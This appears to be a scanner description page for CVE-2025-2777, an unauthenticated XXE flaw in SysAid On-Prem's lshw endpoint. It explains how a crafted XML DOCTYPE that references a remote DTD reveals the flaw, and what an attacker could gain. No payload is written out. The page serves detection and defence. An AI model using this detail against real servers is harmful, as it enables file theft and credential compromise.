CVE-2025-2777 Scanner

SysAid On-Prem is a self-hosted IT service management (ITSM) platform commonly used by enterprises and government organizations to manage and automate help desk operations, asset management, and IT support workflows. It is designed for internal deployment on enterprise servers and is accessible via web interfaces by IT staff. SysAid On-Prem supports custom automation, third-party integrations, and enterprise-level configurations. Organizations choose this product to keep full control over data and security policies. It is typically used by IT departments to centralize incident reporting, asset tracking, and internal service requests. Due to its administrative reach, vulnerabilities in this platform can pose a critical risk to infrastructure integrity.

The vulnerability targeted by this scanner is an unauthenticated XML External Entity (XXE) injection flaw in SysAid On-Prem versions <= 23.3.40. XXE vulnerabilities occur when XML parsers improperly process external entities within submitted XML documents. This particular flaw lies within the lshw processing functionality, where specially crafted XML input allows external resource inclusion. An attacker can exploit this to read arbitrary files on the server or trigger server-side request forgery (SSRF). Because the vulnerability can be exploited without authentication, it increases the attack surface significantly. Successful exploitation may allow attackers to gain sensitive information or control over privileged accounts.

This vulnerability is located in the lshw endpoint of SysAid On-Prem, which processes XML data received in POST requests. The scanner sends a crafted XML payload containing a malicious DOCTYPE declaration that references a remote DTD via the interactsh service. When the server resolves this external DTD, it reveals the vulnerability. Key indicators of successful exploitation include the presence of Java-based User-Agent headers and HTTP callbacks to the attacker-controlled server. The issue is rooted in the lack of proper configuration to restrict external entity loading in the XML parser. The vulnerability can be exploited without authentication or user interaction.

If this vulnerability is exploited, attackers can read local files on the server, leading to information disclosure. In some cases, it may even be possible to steal administrator credentials or session data, enabling full system compromise. Attackers could chain this flaw with others for privilege escalation. The exposure of sensitive internal data could lead to regulatory violations or data leaks. Insecure processing of XML can also facilitate more complex attacks such as SSRF or remote code execution, depending on the environment. Prompt mitigation is necessary to avoid exploitation in the wild.

REFERENCES

• https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
• https://documentation.sysaid.com/docs/24-40-60